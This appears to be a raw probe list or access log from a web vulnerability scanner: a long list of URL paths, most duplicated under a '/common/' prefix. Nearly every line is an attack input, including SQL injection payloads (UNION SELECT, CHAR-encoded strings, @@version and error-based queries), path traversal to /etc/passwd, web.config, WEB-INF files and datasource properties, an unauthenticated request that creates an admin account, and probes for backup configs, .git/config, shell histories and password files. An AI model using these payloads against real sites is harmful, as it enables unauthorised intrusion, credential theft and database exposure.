/common/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/common/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/common/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/common/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/common/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/common/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/jwgl/jxjh/jxjha.asp
/common/jwgl/jxjh/jxjha.asp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/common/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/common/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/admin/admin_database.aspx
/common/admin/admin_database.aspx
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/common/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/common/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/common/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/common/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/common/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/common/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/common/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/common/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/common/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/common/products.asp
/product_view.asp
/common/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/common/product_view.asp
/WS/WebService.asmx
/common/WS/WebService.asmx
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/common/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/common/templates/
/phpRedisAdmin/?overview
/common/service/local/outreach/welcome/nexusSpaces.css
/common/phpRedisAdmin/?overview
/Guest/Baike/Details.aspx?soure=manager&tittle=1'/**/aNd/**/char(106)=1/**/--
/scrp/feedbackdetail.cfm?iSno=-4321%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(110)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20
/common/Guest/Baike/Details.aspx?soure=manager&tittle=1'/**/aNd/**/char(106)=1/**/--
/common/scrp/feedbackdetail.cfm?iSno=-4321%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(110)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20
/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en
/common/CFIDE/administrator/logging/settings.cfm?locale=../../../../custommenu.xml%00en
/bulletin/bulletin_template_show.aspx?id=(select%20char(86))
/filemanage/file_memo.aspx?file_id=(select%20char(109))
/common/bulletin/bulletin_template_show.aspx?id=(select%20char(86))
/common/filemanage/file_memo.aspx?file_id=(select%20char(109))
/PersonalAffair/worklog_template_show.aspx?id=(select%20char(69)%2bchar(65))
/ProjectManage/pm_gatt_inc.aspx?project_id=(select%20char(89)%2bchar(65))
/common/PersonalAffair/worklog_template_show.aspx?id=(select%20char(69)%2bchar(65))
/WorkPlan/plan_template_preview.aspx?template_id=(select%20char(99)%2bchar(65))
/common/ProjectManage/pm_gatt_inc.aspx?project_id=(select%20char(89)%2bchar(65))
/WorkFlow/wf_work_print.aspx?idlist=(select%20char(98)%2bchar(67))
/common/WorkPlan/plan_template_preview.aspx?template_id=(select%20char(99)%2bchar(65))
/WorkFlow/wf_work_stat_setting.aspx?template_id=(select%20char(99)%2bchar(67))
/common/WorkFlow/wf_work_print.aspx?idlist=(select%20char(98)%2bchar(67))
/WorkFlow/wf_work_form_save.aspx?office_missive_id=(select%20char(99)%2bchar(77))
/common/WorkFlow/wf_work_stat_setting.aspx?template_id=(select%20char(99)%2bchar(67))
/WorkFlow/wf_get_fields_approve.aspx?template_id=(select%20char(99)%2bchar(87))
/common/WorkFlow/wf_work_form_save.aspx?office_missive_id=(select%20char(99)%2bchar(77))
/common/WorkFlow/wf_get_fields_approve.aspx?template_id=(select%20char(99)%2bchar(87))
/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml
/common/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml
/findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize=
/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml
/viewthread.php?tid=8974
/common/findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize=
/common/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml
/viewthread.php?tid=31926
/common/viewthread.php?tid=8974
/viewthread.php?tid=250523
/common/viewthread.php?tid=31926
/common/viewthread.php?tid=250523
/zfsmp/sjksz.do
/common/zfsmp/sjksz.do
/install/index.php?insLockfile=1
/common/install/index.php?insLockfile=1
/sgin/filemanage/default.asp?action=viewfolder&path=
/common/sgin/filemanage/default.asp?action=viewfolder&path=
/installation/install.php
/common/installation/install.php
/index.php?c=buylist&a=dellist&id=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/admin/xiugai_zw.asp?id=-1%20union%20select%201,chr(106),3,4,5,chr(97)%26chr(58),7,8,9,10,chr(109),12,13%20from%20admin
/common/index.php?c=buylist&a=dellist&id=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/common/admin/xiugai_zw.asp?id=-1%20union%20select%201,chr(106),3,4,5,chr(97)%26chr(58),7,8,9,10,chr(109),12,13%20from%20admin
/ajax.aspx?type=GetAreaIDByName&AreaName=1'%20and%20char(106)%3E0--
/common/ajax.aspx?type=GetAreaIDByName&AreaName=1'%20and%20char(106)%3E0--
/seeyon/main.do?method=certDown&realPath=../../base/conf/datasource.properties%00a
/manage/node_article_add2.asp?menu=addnewss&qikan_id=238&node_id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(106)%26CHR(109),NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20MSysAccessObjects%16
/common/seeyon/main.do?method=certDown&realPath=../../base/conf/datasource.properties%00a
/common/manage/node_article_add2.asp?menu=addnewss&qikan_id=238&node_id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(106)%26CHR(109),NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20MSysAccessObjects%16
/index.php/Site/article/id/-5724)%20UNION%20ALL%20SELECT%2011,11,11,0x63656461723A66696E643A696969696969,11,11,11,11,11,11,11,11,11%23.html
/common/index.php/Site/article/id/-5724)%20UNION%20ALL%20SELECT%2011,11,11,0x63656461723A66696E643A696969696969,11,11,11,11,11,11,11,11,11%23.html
/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00
/common/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/common/DocCenterService/image?photo_id=10443&photo_size=../../../../../../../../../../etc/passwd%00
/show.aspx?type=1&action=GetImg&pids=(select%20char(58))
/common/show.aspx?type=1&action=GetImg&pids=(select%20char(58))
/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E
/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl
/common/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20sys.fn_VarBinToHexStr(hashbytes('MD5',%20'scanner'))%3E0--
/common/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl
/gg_show.aspx?id=@@version
/wapshop/productlist.aspx?sort=char(@@version)
/common/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27and%20sys.fn_VarBinToHexStr(hashbytes('MD5',%20'scanner'))%3E0--
/dzwd/download2.aspx?fn=../web.config
/common/gg_show.aspx?id=@@version
/common/wapshop/productlist.aspx?sort=char(@@version)
/common/dzwd/download2.aspx?fn=../web.config
/site/review/review_user.asp?id=164459%20and%20@@version%3E0--
/myPaper/dk_zxksView.aspx?ksType=0&tID=1')%20and%20@@version%3E0--&ecID=1&ModuleID=1
/Default.aspx?item=1)and%20@@version%3E0--
/common/site/review/review_user.asp?id=164459%20and%20@@version%3E0--
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,@@version%20--
/common/myPaper/dk_zxksView.aspx?ksType=0&tID=1')%20and%20@@version%3E0--&ecID=1&ModuleID=1
/client/checkuser.aspx?user=%27and%20@@version%3E0--&pwd=1
/common/Default.aspx?item=1)and%20@@version%3E0--
/common/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,@@version%20--
/common/client/checkuser.aspx?user=%27and%20@@version%3E0--&pwd=1
/ViewBuildChart.aspx?ldid=@@version
/Webpage/kc_list.aspx?planid=Y29udmVydChpbnQsKGVjaG8gOTg3Kio2NTQzMjEpKQ==&examName=
/ceping/HouAdmin/GLComUser.aspx
/common/ViewBuildChart.aspx?ldid=@@version
/euseinfo.aspx?id=1%20and%20%20convert%28int%2C%27webscanns%27%29%3E0--
/common/Webpage/kc_list.aspx?planid=Y29udmVydChpbnQsKGVjaG8gOTg3Kio2NTQzMjEpKQ==&examName=
/common/ceping/HouAdmin/GLComUser.aspx
/admin/AdminMailto.asp
/common/euseinfo.aspx?id=1%20and%20%20convert%28int%2C%27webscanns%27%29%3E0--
/img/img.php?class1=1&serch_sql=%201=if%2828234=28234,1,2%29%23
/common/admin/AdminMailto.asp
/tickets/int_order.aspx?id=1%20or/**/1=convert(INT,(char(54)%2bchar(102)%2bchar(55)%2bchar(100)%2bchar(97)%2bchar(56)%2bchar(50)%2bchar(48)%2bchar(97)%2bchar(54)%2bchar(102)%2bchar(55)%2bchar(50)%2bchar(57)%2bchar(57)%2bchar(57)))--
/common/img/img.php?class1=1&serch_sql=%201=if%2828234=28234,1,2%29%23
/common/tickets/int_order.aspx?id=1%20or/**/1=convert(INT,(char(54)%2bchar(102)%2bchar(55)%2bchar(100)%2bchar(97)%2bchar(56)%2bchar(50)%2bchar(48)%2bchar(97)%2bchar(54)%2bchar(102)%2bchar(55)%2bchar(50)%2bchar(57)%2bchar(57)%2bchar(57)))--
/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1%20UNION%20ALL%20SELECT%201,%27A28E84BCD4A21664%27,%2741977a02e9f9548e%27---
/modules/manage/server/requestWorkMode.php
/common/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1%20UNION%20ALL%20SELECT%201,%27A28E84BCD4A21664%27,%2741977a02e9f9548e%27---
/common/modules/manage/server/requestWorkMode.php
/browse/browse_user_db.php
/browse/browse_ellipsoid_db.php
/common/browse/browse_user_db.php
/browse/browse_data_db.php
/common/browse/browse_ellipsoid_db.php
/common/browse/browse_data_db.php
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/ajax.aspx?type=GetAreaIDByName&AreaName=test%27%20union%20select%20password%20from%20admin--
/common/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/common/ajax.aspx?type=GetAreaIDByName&AreaName=test%27%20union%20select%20password%20from%20admin--
/Isv.ashx?action=addadmin&adminuser=webscantest&adminpassword=webscantest&guid=2
/common/Isv.ashx?action=addadmin&adminuser=webscantest&adminpassword=webscantest&guid=2
/Webwsfw/zxsb/?id=(char(54)%2bchar(102)%2bchar(55)%2bchar(100)%2bchar(97)%2bchar(56)%2bchar(50)%2bchar(48)%2bchar(97)%2bchar(54)%2bchar(102)%2bchar(55)%2bchar(50)%2bchar(57)%2bchar(57)%2bchar(57))--
/common/Webwsfw/zxsb/?id=(char(54)%2bchar(102)%2bchar(55)%2bchar(100)%2bchar(97)%2bchar(56)%2bchar(50)%2bchar(48)%2bchar(97)%2bchar(54)%2bchar(102)%2bchar(55)%2bchar(50)%2bchar(57)%2bchar(57)%2bchar(57))--
/kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version--
/kingdee/tree/tree/announce/get_selected.jsp?ids=1)%20union%20select%20NULL,@@version--
/common/kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version--
/common/kingdee/tree/tree/announce/get_selected.jsp?ids=1)%20union%20select%20NULL,@@version--
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/common/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/plugins/mbak/ebak/admin.php
/common/plugins/mbak/ebak/admin.php
/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,md5(4006502031))),1)
/common/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,md5(4006502031))),1)
/emlib4/format/release/aspx/eml_userwh.aspx
/common/emlib4/format/release/aspx/eml_userwh.aspx
/webschool/News/ClassNews/class_bjjj.jsp?classId=webscan%27
/Government/Resources/Program/Calendar.asp?pid=1)%20and%20user%3E0--
/common/webschool/News/ClassNews/class_bjjj.jsp?classId=webscan%27
/oxoxoxoxoxoxox.com
/common/Government/Resources/Program/Calendar.asp?pid=1)%20and%20user%3E0--
/oxoxoxoxoxoxox.com/
/common/oxoxoxoxoxoxox.com
/common/oxoxoxoxoxoxox.com/
/phpinfo.php
/info.php
/common/phpinfo.php
/test.php
/common/info.php
/common/test.php
/pass.txt
/passwd
/common/pass.txt
/password.txt
/common/passwd
/passwords.txt
/common/password.txt
/users.txt
/common/passwords.txt
/users.ini
/common/users.txt
/admin.cfg
/common/users.ini
/install.log
/common/admin.cfg
/database.inc
/common/install.log
/common.inc
/common/database.inc
/db.inc
/common/common.inc
/connect.inc
/common/db.inc
/conn.inc
/common/connect.inc
/sql.inc
/common/conn.inc
/.bash_history
/common/sql.inc
/.bashrc
/common/.bash_history
/Web.config
/common/.bashrc
/Global.asax
/common/Web.config
/Global.asa
/common/Global.asax
/Global.asax.cs
/common/Global.asa
/data.mdb
/common/Global.asax.cs
/domcfg.nsf
/common/data.mdb
/names.nsf
/common/domcfg.nsf
/log.nsf
/common/names.nsf
/domlog.nsf
/common/log.nsf
/.rediscli_history
/common/domlog.nsf
/data/%23data.mdb
/common/.rediscli_history
/data/admin.mdb
/common/data/%23data.mdb
/admin/htmledit/db/ewebeditor.mdb
/common/data/admin.mdb
/_database/_database.mdb
/common/admin/htmledit/db/ewebeditor.mdb
/databases/4dsdo0/%254&764/%23fgf&0O.mdb
/common/_database/_database.mdb
/admin/editor/db/ewebeditor.mdb
/common/databases/4dsdo0/%254&764/%23fgf&0O.mdb
/news/shuju/data.mdb
/common/admin/editor/db/ewebeditor.mdb
/DataBase/%23$DB.mdb
/common/news/shuju/data.mdb
/data/article.mdb
/common/DataBase/%23$DB.mdb
/Databases/0791idc.mdb
/common/data/article.mdb
/Databases/asp99cms.mdb
/common/Databases/0791idc.mdb
/SH_Data/SH_DataBase.mdb
/common/Databases/asp99cms.mdb
/_database/e3b3ee1b5da271ai.mdb
/common/SH_Data/SH_DataBase.mdb
/.git/config
/common/_database/e3b3ee1b5da271ai.mdb
/WS_FTP.LOG
/common/.git/config
/.htaccess
/common/WS_FTP.LOG
/test.php
/common/.htaccess
/common/test.php
/test.jsp
/common/test.asp
/admin.jsp
/common/test.jsp
/admin.asp
/common/admin.jsp
/admin.php
/manager.php
/common/admin.asp
/manager.jsp
/common/admin.php
/manager.asp
/common/manager.php
/test.aspx
/common/manager.jsp
/admin.aspx
/common/manager.asp
/manager.aspx
/common/test.aspx
/console/login/LoginForm.jsp
/common/admin.aspx
/conf
/common/manager.aspx
/config.inc.php.bak
/common/console/login/LoginForm.jsp
/config/config_ucenter.php.bak
/common/conf
/config/config_global.php.bak
/common.zip
/uc_server/data/config.inc.php.bak
/common.rar
/uc_server/data/config_hand_bak
/common.7z
/data/common.inc.php.bak
/common.tar.gz
/wp-config.php.bak
/common.gz
/WEB-INF/database.properties
/common.tgz
/config/config_ucenter.php_bak
/common.bz2
/create.sql
/common.tar
/common/config.inc.php.bak
/common/config/config_ucenter.php.bak
/common/config/config_global.php.bak
/common/uc_server/data/config.inc.php.bak
/common/uc_server/data/config_hand_bak
/common/data/common.inc.php.bak
/common/wp-config.php.bak
/common/WEB-INF/database.properties
/common/config/config_ucenter.php_bak
/common/create.sql
